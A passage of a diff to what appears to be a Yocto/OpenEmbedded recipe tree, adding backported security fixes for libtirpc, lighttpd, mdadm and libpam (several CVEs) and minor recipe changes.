[http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed} +CVE: CVE-2021-46828 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + src/svc.c | 17 +++++++++++++- + src/svc_vc.c | 62 +++++++++++++++++++++++++++++++++++++++++++++++++++- + 2 files changed, 77 insertions(+), 2 deletions(-) + +diff --git a/src/svc.c b/src/svc.c +index 6db164b..3a8709f 100644 +--- a/src/svc.c ++++ b/src/svc.c +@@ -57,7 +57,7 @@ + + #define max(a, b) (a > b ? a : b) + +-static SVCXPRT **__svc_xports; ++SVCXPRT **__svc_xports; + int __svc_maxrec; + + /* +@@ -194,6 +194,21 @@ __xprt_do_unregister (xprt, dolock) + rwlock_unlock (&svc_fd_lock); + } + ++int ++svc_open_fds() ++{ ++ int ix; ++ int nfds = 0; ++ ++ rwlock_rdlock (&svc_fd_lock); ++ for (ix = 0; ix < svc_max_pollfd; ++ix) { ++ if (svc_pollfd[ix].fd != -1) ++ nfds++; ++ } ++ rwlock_unlock (&svc_fd_lock); ++ return (nfds); ++} ++ + /* + * Add a service program to the callout list. + * The dispatch routine will be called when a rpc request for this +diff --git a/src/svc_vc.c b/src/svc_vc.c +index c23cd36..1729963 100644 +--- a/src/svc_vc.c ++++ b/src/svc_vc.c +@@ -64,6 +64,8 @@ + + + extern rwlock_t svc_fd_lock; ++extern SVCXPRT **__svc_xports; ++extern int svc_open_fds(); + + static SVCXPRT *makefd_xprt(int, u_int, u_int); + static bool_t rendezvous_request(SVCXPRT *, struct rpc_msg *); +@@ -82,6 +84,7 @@ static void svc_vc_ops(SVCXPRT *); + static bool_t svc_vc_control(SVCXPRT *xprt, const u_int rq, void *in); + static bool_t svc_vc_rendezvous_control (SVCXPRT *xprt, const u_int rq, + void *in); ++static int __svc_destroy_idle(int timeout); + + struct cf_rendezvous { /* kept in xprt->xp_p1 for rendezvouser */ + u_int sendsize; +@@ -312,13 +315,14 @@ done: + return (xprt); + } + ++ + /*ARGSUSED*/ + static bool_t + rendezvous_request(xprt, msg) + SVCXPRT *xprt; + struct rpc_msg *msg; + { +- int sock, flags; ++ int sock, flags, nfds, cnt; + struct cf_rendezvous *r; + struct cf_conn *cd; + struct sockaddr_storage addr; +@@ -378,6 +382,16 @@ again: + + gettimeofday(&cd->last_recv_time, NULL); + ++ nfds = svc_open_fds(); ++ if (nfds >= (_rpc_dtablesize() / 5) * 4) { ++ /* destroy idle connections */ ++ cnt = __svc_destroy_idle(15); ++ if (cnt == 0) { ++ /* destroy least active */ ++ __svc_destroy_idle(0); ++ } ++ } ++ + return (FALSE); /* there is never an rpc msg to be processed */ + } + +@@ -819,3 +833,49 @@ __svc_clean_idle(fd_set *fds, int timeout, bool_t cleanblock) + { + return FALSE; + } ++ ++static int ++__svc_destroy_idle(int timeout) ++{ ++ int i, ncleaned = 0; ++ SVCXPRT *xprt, *least_active; ++ struct timeval tv, tdiff, tmax; ++ struct cf_conn *cd; ++ ++ gettimeofday(&tv, NULL); ++ tmax.tv_sec = tmax.tv_usec = 0; ++ least_active = NULL; ++ rwlock_wrlock(&svc_fd_lock); ++ ++ for (i = 0; i <= svc_max_pollfd; i++) { ++ if (svc_pollfd[i].fd == -1) ++ continue; ++ xprt = __svc_xports[i]; ++ if (xprt == NULL || xprt->xp_ops == NULL || ++ xprt->xp_ops->xp_recv != svc_vc_recv) ++ continue; ++ cd = (struct cf_conn *)xprt->xp_p1; ++ if (!cd->nonblock) ++ continue; ++ if (timeout == 0) { ++ timersub(&tv, &cd->last_recv_time, &tdiff); ++ if (timercmp(&tdiff, &tmax, >)) { ++ tmax = tdiff; ++ least_active = xprt; ++ } ++ continue; ++ } ++ if (tv.tv_sec - cd->last_recv_time.tv_sec > timeout) { ++ __xprt_unregister_unlocked(xprt); ++ __svc_vc_dodestroy(xprt); ++ ncleaned++; ++ } ++ } ++ if (timeout == 0 && least_active != NULL) { ++ __xprt_unregister_unlocked(least_active); ++ __svc_vc_dodestroy(least_active); ++ ncleaned++; ++ } ++ rwlock_unlock(&svc_fd_lock); ++ return (ncleaned); ++} +-- +2.25.1 + diff --git a/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb b/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb index 10a324c3b6..80151ff83a 100644 --- a/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb +++ b/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb @@ -9,7 +9,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=f835cce8852481e4b2bbbdd23b5e47f3 \ PROVIDES = "virtual/librpc" -SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BP}.tar.bz2" +SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BP}.tar.bz2 \ + file://CVE-2021-46828.patch \ + " UPSTREAM_CHECK_URI = "https://sourceforge.net/projects/libtirpc/files/libtirpc/" UPSTREAM_CHECK_REGEX = "(?P<pver>\d+(\.\d+)+)/" SRC_URI[md5sum] = "b25f9cc18bfad50f7c446c77f4ae00bb" @@ -20,7 +22,7 @@ inherit autotools pkgconfig EXTRA_OECONF = "--disable-gssapi" do_install_append() { - chown root:root ${D}${sysconfdir}/netconfig + test -e ${D}${sysconfdir}/netconfig && chown root:root ${D}${sysconfdir}/netconfig } BBCLASSEXTEND = "native nativesdk" diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch index f17bdce2c0..44b9136b05 100644 --- a/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch +++ b/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch @@ -1,4 +1,4 @@ -From 22afc5d9aaa215c3c87ba21c77d47da44ab3b113 Mon Sep 17 00:00:00 2001 +From f918d5ba6ff1d439822be063237aea2705ea27b8 Mon Sep 17 00:00:00 2001 From: Alexander Kanavin <alex.kanavin@gmail.com> Date: Fri, 26 Aug 2016 18:20:32 +0300 Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script. @@ -6,15 +6,16 @@ Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script. RP 2014/5/22 Upstream-Status: Pending Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com> + --- configure.ac | 16 ++++++++++++---- 1 file changed, 12 insertions(+), 4 deletions(-) diff --git a/configure.ac b/configure.ac -index 5383cec..c29a902 100644 +index dbddfb9..62cf17f 100644 --- a/configure.ac +++ b/configure.ac -@@ -651,10 +651,18 @@ AC_ARG_WITH([pcre], +@@ -748,10 +748,18 @@ AC_ARG_WITH([pcre], ) AC_MSG_RESULT([$WITH_PCRE]) @@ -37,6 +38,3 @@ index 5383cec..c29a902 100644 else AC_PATH_PROG([PCRECONFIG], [pcre-config]) if test -n "$PCRECONFIG"; then --- -2.15.0 - diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch new file mode 100644 index 0000000000..e226366112 --- /dev/null +++ b/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch @@ -0,0 +1,224 @@ +From a566fe4cc9f9d0ef9cfdcbc13159ef0644e91c9c Mon Sep 17 00:00:00 2001 +From: Glenn Strauss <gstrauss@gluelogic.com> +Date: Wed, 23 Dec 2020 23:14:47 -0500 +Subject: [PATCH] reuse large mem chunks (fix mem usage) (fixes #3033) + +(cherry picked from commit 7ba521ffb4959f6f74a609d5d4acafc29a038337) + +(thx flynn) + +fix large memory usage for large file downloads from dynamic backends + +reuse or release large memory chunks + +x-ref: + "Memory Growth with PUT and full buffered streams" + https://redmine.lighttpd.net/issues/3033 + +Upstream-Status: Backport +Comment: Hunk refreshed to make it backword compatible. +https://redmine.lighttpd.net/projects/lighttpd/repository/14/revisions/7ba521ffb4959f6f74a609d5d4acafc29a038337 +Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com> + +--- + src/chunk.c | 99 +++++++++++++++++++++++++++++++++--------- + src/chunk.h | 2 + + src/http-header-glue.c | 2 +- + 3 files changed, 82 insertions(+), 21 deletions(-) + +diff --git a/src/chunk.c b/src/chunk.c +index 133308f..d7259b9 100644 +--- a/src/chunk.c ++++ b/src/chunk.c +@@ -28,16 +28,20 @@ + static size_t chunk_buf_sz = 8192; + static chunk *chunks, *chunks_oversized; + static chunk *chunk_buffers; ++static int chunks_oversized_n; + static array *chunkqueue_default_tempdirs = NULL; + static off_t chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE; + + void chunkqueue_set_chunk_size (size_t sz) + { +- chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 8192; ++ size_t x = 1024; ++ while (x < sz && x < (1u << 30)) x <<= 1; ++ chunk_buf_sz = sz > 0 ? x : 8192; + } + + void chunkqueue_set_tempdirs_default_reset (void) + { ++ chunk_buf_sz = 8192; + chunkqueue_default_tempdirs = NULL; + chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE; + } +@@ -120,15 +124,49 @@ static void chunk_free(chunk *c) { + free(c); + } + +-buffer * chunk_buffer_acquire(void) { ++static chunk * chunk_pop_oversized(size_t sz) { ++ /* future: might have buckets of certain sizes, up to socket buf sizes */ ++ if (chunks_oversized && chunks_oversized->mem->size >= sz) { ++ --chunks_oversized_n; ++ chunk *c = chunks_oversized; ++ chunks_oversized = c->next; ++ return c; ++ } ++ return NULL; ++} ++ ++static void chunk_push_oversized(chunk * const c, const size_t sz) { ++ if (chunks_oversized_n < 64 && chunk_buf_sz >= 4096) { ++ ++chunks_oversized_n; ++ chunk **co = &chunks_oversized; ++ while (*co && sz < (*co)->mem->size) co = &(*co)->next; ++ c->next = *co; ++ *co = c; ++ } ++ else ++ chunk_free(c); ++} ++ ++static buffer * chunk_buffer_acquire_sz(size_t sz) { + chunk *c; + buffer *b; +- if (chunks) { +- c = chunks; +- chunks = c->next; ++ if (sz <= chunk_buf_sz) { ++ if (chunks) { ++ c = chunks; ++ chunks = c->next; ++ } ++ else ++ c = chunk_init(chunk_buf_sz); ++ /* future: might choose to pop from chunks_oversized, if available ++ * (even if larger than sz) rather than allocating new chunk ++ * (and if doing so, might replace chunks_oversized_n) */ + } + else { +- c = chunk_init(chunk_buf_sz); ++ /*(round up to nearest chunk_buf_sz)*/ ++ sz = (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1); ++ c = chunk_pop_oversized(sz); ++ if (NULL == c) ++ c = chunk_init(sz); + } + c->next = chunk_buffers; + chunk_buffers = c; +@@ -137,21 +175,47 @@ buffer * chunk_buffer_acquire(void) { + return b; + } + ++buffer * chunk_buffer_acquire(void) { ++ return chunk_buffer_acquire_sz(chunk_buf_sz); ++} ++ + void chunk_buffer_release(buffer *b) { + if (NULL == b) return; +- if (b->size >= chunk_buf_sz && chunk_buffers) { ++ if (chunk_buffers) { + chunk *c = chunk_buffers; + chunk_buffers = c->next; + c->mem = b; +- c->next = chunks; +- chunks = c; + buffer_clear(b); ++ if (b->size == chunk_buf_sz) { ++ c->next = chunks; ++ chunks = c; ++ } ++ else if (b->size > chunk_buf_sz) ++ chunk_push_oversized(c, b->size); ++ else ++ chunk_free(c); + } + else { + buffer_free(b); + } + } + ++size_t chunk_buffer_prepare_append(buffer * const b, size_t sz) { ++ if (sz > chunk_buffer_string_space(b)) { ++ sz += b->used ? b->used : 1; ++ buffer * const cb = chunk_buffer_acquire_sz(sz); ++ /* swap buffer contents and copy original b->ptr into larger b->ptr */ ++ /*(this does more than buffer_move())*/ ++ buffer tb = *b; ++ *b = *cb; ++ *cb = tb; ++ if ((b->used = tb.used)) ++ memcpy(b->ptr, tb.ptr, tb.used); ++ chunk_buffer_release(cb); ++ } ++ return chunk_buffer_string_space(b); ++} ++ + static chunk * chunk_acquire(size_t sz) { + if (sz <= chunk_buf_sz) { + if (chunks) { +@@ -162,13 +226,10 @@ static chunk * chunk_acquire(size_t sz) { + sz = chunk_buf_sz; + } + else { +- sz = (sz + 8191) & ~8191uL; +- /* future: might have buckets of certain sizes, up to socket buf sizes*/ +- if (chunks_oversized && chunks_oversized->mem->size >= sz) { +- chunk *c = chunks_oversized; +- chunks_oversized = c->next; +- return c; +- } ++ /*(round up to nearest chunk_buf_sz)*/ ++ sz = (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1); ++ chunk *c = chunk_pop_oversized(sz); ++ if (c) return c; + } + + return chunk_init(sz); +@@ -183,10 +244,7 @@ static void chunk_release(chunk *c) { + } + else if (sz > chunk_buf_sz) { + chunk_reset(c); +- chunk **co = &chunks_oversized; +- while (*co && sz < (*co)->mem->size) co = &(*co)->next; +- c->next = *co; +- *co = c; ++ chunk_push_oversized(c, sz); + } + else { + chunk_free(c); +@@ -205,6 +263,7 @@ void chunkqueue_chunk_pool_clear(void) + chunk_free(c); + } + chunks_oversized = NULL; ++ chunks_oversized_n = 0; + } + + void chunkqueue_chunk_pool_free(void) +diff --git a/src/chunk.h b/src/chunk.h +index 4c6b7e4..93f343c 100644 +--- a/src/chunk.h ++++ b/src/chunk.h +@@ -50,6 +50,8 @@ typedef struct { + buffer * chunk_buffer_acquire(void); + void chunk_buffer_release(buffer *b); + ++size_t chunk_buffer_prepare_append (buffer *b, size_t sz); ++ + void chunkqueue_chunk_pool_clear(void); + void chunkqueue_chunk_pool_free(void); + +diff --git a/src/http-header-glue.c b/src/http-header-glue.c +index d54f00c..2231fba 100644 +--- a/src/http-header-glue.c ++++ b/src/http-header-glue.c +@@ -1267,7 +1267,7 @@ handler_t http_response_read(server *srv, connection *con, http_response_opts *o + if (avail < toread) { + /*(add avail+toread to reduce allocations when ioctl EOPNOTSUPP)*/ + avail = avail ? avail - 1 + toread : toread; +- buffer_string_prepare_append(b, avail); ++ avail = chunk_buffer_prepare_append(b, avail); + } + + n = read(fd, b->ptr+buffer_string_length(b), avail); diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch new file mode 100644 index 0000000000..da59b7297a --- /dev/null +++ b/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch @@ -0,0 +1,100 @@ +From 27103f3f8b1a2857aa45b889e775435f7daf141f Mon Sep 17 00:00:00 2001 +From: povcfe <povcfe@qq.com> +Date: Wed, 5 Jan 2022 11:11:09 +0000 +Subject: [PATCH] [mod_extforward] fix out-of-bounds (OOB) write (fixes #3134) + +(thx povcfe) + +(edited: gstrauss) + +There is a potential remote denial of service in lighttpd mod_extforward +under specific, non-default and uncommon 32-bit lighttpd mod_extforward +configurations. + +Under specific, non-default and uncommon lighttpd mod_extforward +configurations, a remote attacker can trigger a 4-byte out-of-bounds +write of value '-1' to the stack. This is not believed to be exploitable +in any way beyond triggering a crash of the lighttpd server on systems +where the lighttpd server has been built 32-bit and with compiler flags +which enable a stack canary -- gcc/clang -fstack-protector-strong or +-fstack-protector-all, but bug not visible with only -fstack-protector. + +With standard lighttpd builds using -O2 optimization on 64-bit x86_64, +this bug has not been observed to cause adverse behavior, even with +gcc/clang -fstack-protector-strong. + +For the bug to be reachable, the user must be using a non-default +lighttpd configuration which enables mod_extforward and configures +mod_extforward to accept and parse the "Forwarded" header from a trusted +proxy. At this time, support for RFC7239 Forwarded is not common in CDN +providers or popular web server reverse proxies. It bears repeating that +for the user to desire to configure lighttpd mod_extforward to accept +"Forwarded", the user must also be using a trusted proxy (in front of +lighttpd) which understands and actively modifies the "Forwarded" header +sent to lighttpd. + +lighttpd natively supports RFC7239 "Forwarded" +hiawatha natively supports RFC7239 "Forwarded" + +nginx can be manually configured to add a "Forwarded" header +https://www.nginx.com/resources/wiki/start/topics/examples/forwarded/ + +A 64-bit build of lighttpd on x86_64 (not known to be affected by bug) +in front of another 32-bit lighttpd will detect and reject a malicious +"Forwarded" request header, thereby thwarting an attempt to trigger +this bug in an upstream 32-bit lighttpd. + +The following servers currently do not natively support RFC7239 Forwarded: +nginx +apache2 +caddy +node.js +haproxy +squid +varnish-cache +litespeed + +Given the general dearth of support for RFC7239 Forwarded in popular +CDNs and web server reverse proxies, and given the prerequisites in +lighttpd mod_extforward needed to reach this bug, the number of lighttpd +servers vulnerable to this bug is estimated to be vanishingly small. +Large systems using reverse proxies are likely running 64-bit lighttpd, +which is not known to be adversely affected by this bug. + +In the future, it is desirable for more servers to implement RFC7239 +Forwarded. lighttpd developers would like to thank povcfe for reporting +this bug so that it can be fixed before more CDNs and web servers +implement RFC7239 Forwarded. + +x-ref: + "mod_extforward plugin has out-of-bounds (OOB) write of 4-byte -1" + https://redmine.lighttpd.net/issues/3134 + (not yet written or published) + CVE-2022-22707 + +Upstream-Status: Backport +CVE: CVE-2022-22707 +Signed-off-by: Ross Burton <ross.burton@arm.com> + +Signed-off-by: Purushottam Choudhary <purushottam.choudhary@kpit.com> +Signed-off-by: Purushottam Choudhary <purushottamchoudhary29@gmail.com> +--- + src/mod_extforward.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/src/mod_extforward.c b/src/mod_extforward.c +index ba957e04..fdaef7f6 100644 +--- a/src/mod_extforward.c ++++ b/src/mod_extforward.c +@@ -715,7 +715,7 @@ static handler_t mod_extforward_Forwarded (request_st * const r, plugin_data * c + while (s[i] == ' ' || s[i] == '\t') ++i; + if (s[i] == ';') { ++i; continue; } + if (s[i] == ',') { +- if (j >= (int)(sizeof(offsets)/sizeof(int))) break; ++ if (j >= (int)(sizeof(offsets)/sizeof(int))-1) break; + offsets[++j] = -1; /*("offset" separating params from next proxy)*/ + ++i; + continue; +-- +2.25.1 + diff --git a/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch b/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch new file mode 100644 index 0000000000..fd75ca6e26 --- /dev/null +++ b/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch @@ -0,0 +1,35 @@ +From 2e08ee1d404e308f15551277e92b7605ddfa96a8 Mon Sep 17 00:00:00 2001 +From: Glenn Strauss <gstrauss@gluelogic.com> +Date: Fri, 29 Nov 2019 18:18:52 -0500 +Subject: [PATCH] default chunk size 8k (was 4k) + +Upstream-Status: Backport +Comment: No hunk refreshed +https://git.lighttpd.net/lighttpd/lighttpd1.4/commit/304e46d4f808c46cbb025edfacf2913a30ce8855 +Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com> +--- + src/chunk.c | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +diff --git a/src/chunk.c b/src/chunk.c +index 09dd3f1..133308f 100644 +--- a/src/chunk.c ++++ b/src/chunk.c +@@ -25,7 +25,7 @@ + #define DEFAULT_TEMPFILE_SIZE (1 * 1024 * 1024) + #define MAX_TEMPFILE_SIZE (128 * 1024 * 1024) + +-static size_t chunk_buf_sz = 4096; ++static size_t chunk_buf_sz = 8192; + static chunk *chunks, *chunks_oversized; + static chunk *chunk_buffers; + static array *chunkqueue_default_tempdirs = NULL; +@@ -33,7 +33,7 @@ static off_t chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE; + + void chunkqueue_set_chunk_size (size_t sz) + { +- chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 4096; ++ chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 8192; + } + + void chunkqueue_set_tempdirs_default_reset (void) diff --git a/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb b/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb index 35a268a03f..357a269015 100644 --- a/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb +++ b/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb @@ -14,10 +14,13 @@ RRECOMMENDS_${PN} = "lighttpd-module-access \ lighttpd-module-accesslog" SRC_URI = "http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-${PV}.tar.xz \ + file://0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch \ file://index.html.lighttpd \ file://lighttpd.conf \ file://lighttpd \ file://0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch \ + file://default-chunk-size-8k.patch \ + file://0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch \ " SRC_URI[md5sum] = "be4bda2c28bcbdac6eb941528f6edf03" diff --git a/meta/recipes-extended/lsof/lsof_4.91.bb b/meta/recipes-extended/lsof/lsof_4.91.bb index b3adfd57af..7c85bf23fc 100644 --- a/meta/recipes-extended/lsof/lsof_4.91.bb +++ b/meta/recipes-extended/lsof/lsof_4.91.bb @@ -3,7 +3,7 @@ DESCRIPTION = "Lsof is a Unix-specific diagnostic tool. \ Its name stands for LiSt Open Files, and it does just that." HOMEPAGE = "http://people.freebsd.org/~abe/" SECTION = "devel" -LICENSE = "BSD" +LICENSE = "Spencer-94" LIC_FILES_CHKSUM = "file://00README;beginline=645;endline=679;md5=964df275d26429ba3b39dbb9f205172a" # Upstream lsof releases are hosted on an ftp server which times out download diff --git a/meta/recipes-extended/ltp/ltp_20200120.bb b/meta/recipes-extended/ltp/ltp_20200120.bb index 6633755a20..505b7b14fc 100644 --- a/meta/recipes-extended/ltp/ltp_20200120.bb +++ b/meta/recipes-extended/ltp/ltp_20200120.bb @@ -29,7 +29,7 @@ CFLAGS_append_powerpc64 = " -D__SANE_USERSPACE_TYPES__" CFLAGS_append_mipsarchn64 = " -D__SANE_USERSPACE_TYPES__" SRCREV = "4079aaf264d0e9ead042b59d1c5f4e643620d0d5" -SRC_URI = "git://github.com/linux-test-project/ltp.git \ +SRC_URI = "git://github.com/linux-test-project/ltp.git;branch=master;protocol=https \ file://0001-build-Add-option-to-select-libc-implementation.patch \ file://0003-Check-if-__GLIBC_PREREQ-is-defined-before-using-it.patch \ file://0004-guard-mallocopt-with-__GLIBC__.patch \ diff --git a/meta/recipes-extended/mdadm/files/CVE-2023-28736.patch b/meta/recipes-extended/mdadm/files/CVE-2023-28736.patch new file mode 100644 index 0000000000..8e0a06cbc7 --- /dev/null +++ b/meta/recipes-extended/mdadm/files/CVE-2023-28736.patch @@ -0,0 +1,77 @@ +From ced5fa8b170ad448f4076e24a10c731b5cfb36ce Mon Sep 17 00:00:00 2001 +From: Blazej Kucman <blazej.kucman@intel.com> +Date: Fri, 3 Dec 2021 15:31:15 +0100 +Subject: mdadm: block creation with long names + +This fixes buffer overflows in create_mddev(). It prohibits +creation with not supported names for DDF and native. For IMSM, +mdadm will do silent cut to 16 later. + +Signed-off-by: Mariusz Tkaczyk <mariusz.tkaczyk@linux.intel.com> +Signed-off-by: Blazej Kucman <blazej.kucman@intel.com> +Signed-off-by: Jes Sorensen <jsorensen@fb.com> +--- + +Upstream-Status: Backport from [https://git.kernel.org/pub/scm/utils/mdadm/mdadm.git/patch/?id=ced5fa8b170ad448f4076e24a10c731b5cfb36ce] +CVE: CVE-2023-28736 +Signed-off-by: Ashish Sharma <asharma@mvista.com> + + mdadm.8.in | 5 +++++ + mdadm.c | 9 ++++++++- + mdadm.h | 5 +++++ + 3 files changed, 18 insertions(+), 1 deletion(-) + +diff --git a/mdadm.8.in b/mdadm.8.in +index 28d773c2..68e100cb 100644 +--- a/mdadm.8.in ++++ b/mdadm.8.in +@@ -2186,6 +2186,11 @@ is run, but will be created by + .I udev + once the array becomes active. + ++The max length md-device name is limited to 32 characters. ++Different metadata types have more strict limitation ++(like IMSM where only 16 characters are allowed). ++For that reason, long name could be truncated or rejected, it depends on metadata policy. ++ + As devices are added, they are checked to see if they contain RAID + superblocks or filesystems. They are also checked to see if the variance in + device size exceeds 1%. +diff --git a/mdadm.c b/mdadm.c +index 91e67467..26299b2e 100644 +--- a/mdadm.c ++++ b/mdadm.c +@@ -1359,9 +1359,16 @@ int main(int argc, char *argv[]) + mdfd = open_mddev(devlist->devname, 1); + if (mdfd < 0) + exit(1); +- } else ++ } else { ++ char *bname = basename(devlist->devname); ++ ++ if (strlen(bname) > MD_NAME_MAX) { ++ pr_err("Name %s is too long.\n", devlist->devname); ++ exit(1); ++ } + /* non-existent device is OK */ + mdfd = open_mddev(devlist->devname, 0); ++ } + if (mdfd == -2) { + pr_err("device %s exists but is not an md array.\n", devlist->devname); + exit(1); +diff --git a/mdadm.h b/mdadm.h +index 54567396..c7268a71 100644 +--- a/mdadm.h ++++ b/mdadm.h +@@ -1880,3 +1880,8 @@ enum r0layout { + #define INVALID_SECTORS 1 + /* And another special number needed for --data_offset=variable */ + #define VARIABLE_OFFSET 3 ++ ++/** ++ * This is true for native and DDF, IMSM allows 16. ++ */ ++#define MD_NAME_MAX 32 +-- +cgit + diff --git a/meta/recipes-extended/mdadm/files/CVE-2023-28938.patch b/meta/recipes-extended/mdadm/files/CVE-2023-28938.patch new file mode 100644 index 0000000000..1e2990d79a --- /dev/null +++ b/meta/recipes-extended/mdadm/files/CVE-2023-28938.patch @@ -0,0 +1,80 @@ +From 7d374a1869d3a84971d027a7f4233878c8f25a62 Mon Sep 17 00:00:00 2001 +From: Mateusz Grzonka <mateusz.grzonka@intel.com> +Date: Tue, 27 Jul 2021 10:25:18 +0200 +Subject: Fix memory leak after "mdadm --detail" + +Signed-off-by: Mateusz Grzonka <mateusz.grzonka@intel.com> +Signed-off-by: Jes Sorensen <jsorensen@fb.com> +--- +Upstream-Status: Backport from [https://git.kernel.org/pub/scm/utils/mdadm/mdadm.git/patch/?id=7d374a1869d3a84971d027a7f4233878c8f25a62] +CVE: CVE-2023-28938 +Signed-off-by: Ashish Sharma <asharma@mvista.com> + + Detail.c | 20 +++++++++----------- + 1 file changed, 9 insertions(+), 11 deletions(-) + +diff --git a/Detail.c b/Detail.c +index ad56344f..d3af0ab5 100644 +--- a/Detail.c ++++ b/Detail.c +@@ -66,11 +66,11 @@ int Detail(char *dev, struct context *c) + int spares = 0; + struct stat stb; + int failed = 0; +- struct supertype *st; ++ struct supertype *st = NULL; + char *subarray = NULL; + int max_disks = MD_SB_DISKS; /* just a default */ + struct mdinfo *info = NULL; +- struct mdinfo *sra; ++ struct mdinfo *sra = NULL; + struct mdinfo *subdev; + char *member = NULL; + char *container = NULL; +@@ -93,8 +93,7 @@ int Detail(char *dev, struct context *c) + if (!sra) { + if (md_get_array_info(fd, &array)) { + pr_err("%s does not appear to be an md device\n", dev); +- close(fd); +- return rv; ++ goto out; + } + } + external = (sra != NULL && sra->array.major_version == -1 && +@@ -108,16 +107,13 @@ int Detail(char *dev, struct context *c) + sra->devs == NULL) { + pr_err("Array associated with md device %s does not exist.\n", + dev); +- close(fd); +- sysfs_free(sra); +- return rv; ++ goto out; + } + array = sra->array; + } else { + pr_err("cannot get array detail for %s: %s\n", + dev, strerror(errno)); +- close(fd); +- return rv; ++ goto out; + } + } + +@@ -827,10 +823,12 @@ out: + close(fd); + free(subarray); + free(avail); +- for (d = 0; d < n_devices; d++) +- free(devices[d]); ++ if (devices) ++ for (d = 0; d < n_devices; d++) ++ free(devices[d]); + free(devices); + sysfs_free(sra); ++ free(st); + return rv; + } + +-- +cgit + diff --git a/meta/recipes-extended/mdadm/mdadm_4.1.bb b/meta/recipes-extended/mdadm/mdadm_4.1.bb index bb77759cf9..ca326fd1cb 100644 --- a/meta/recipes-extended/mdadm/mdadm_4.1.bb +++ b/meta/recipes-extended/mdadm/mdadm_4.1.bb @@ -24,6 +24,8 @@ SRC_URI = "${KERNELORG_MIRROR}/linux/utils/raid/mdadm/${BPN}-${PV}.tar.xz \ file://0001-mdadm-add-option-y-for-use-syslog-to-recive-event-re.patch \ file://include_sysmacros.patch \ file://0001-mdadm-skip-test-11spare-migration.patch \ + file://CVE-2023-28736.patch \ + file://CVE-2023-28938.patch \ " SRC_URI[md5sum] = "51bf3651bd73a06c413a2f964f299598" diff --git a/meta/recipes-extended/newt/libnewt_0.52.21.bb b/meta/recipes-extended/newt/libnewt_0.52.21.bb index 88b4cf4a03..3d35a17c92 100644 --- a/meta/recipes-extended/newt/libnewt_0.52.21.bb +++ b/meta/recipes-extended/newt/libnewt_0.52.21.bb @@ -29,7 +29,7 @@ SRC_URI[sha256sum] = "265eb46b55d7eaeb887fca7a1d51fe115658882dfe148164b6c49fccac S = "${WORKDIR}/newt-${PV}" -inherit autotools-brokensep python3native python3-dir +inherit autotools-brokensep python3native python3-dir python3targetconfig EXTRA_OECONF = "--without-tcl --with-python" diff --git a/meta/recipes-extended/pam/libpam/CVE-2024-22365.patch b/meta/recipes-extended/pam/libpam/CVE-2024-22365.patch new file mode 100644 index 0000000000..33ac37b7f0 --- /dev/null +++ b/meta/recipes-extended/pam/libpam/CVE-2024-22365.patch @@ -0,0 +1,59 @@ +From 031bb5a5d0d950253b68138b498dc93be69a64cb Mon Sep 17 00:00:00 2001 +From: Matthias Gerstner <matthias.gerstner@suse.de> +Date: Wed, 27 Dec 2023 14:01:59 +0100 +Subject: [PATCH] pam_namespace: protect_dir(): use O_DIRECTORY to prevent + local DoS situations + +Without O_DIRECTORY the path crawling logic is subject to e.g. FIFOs +being placed in user controlled directories, causing the PAM module to +block indefinitely during `openat()`. + +Pass O_DIRECTORY to cause the `openat()` to fail if the path does not +refer to a directory. + +With this the check whether the final path element is a directory +becomes unnecessary, drop it. + +Upstream-Status: Backport 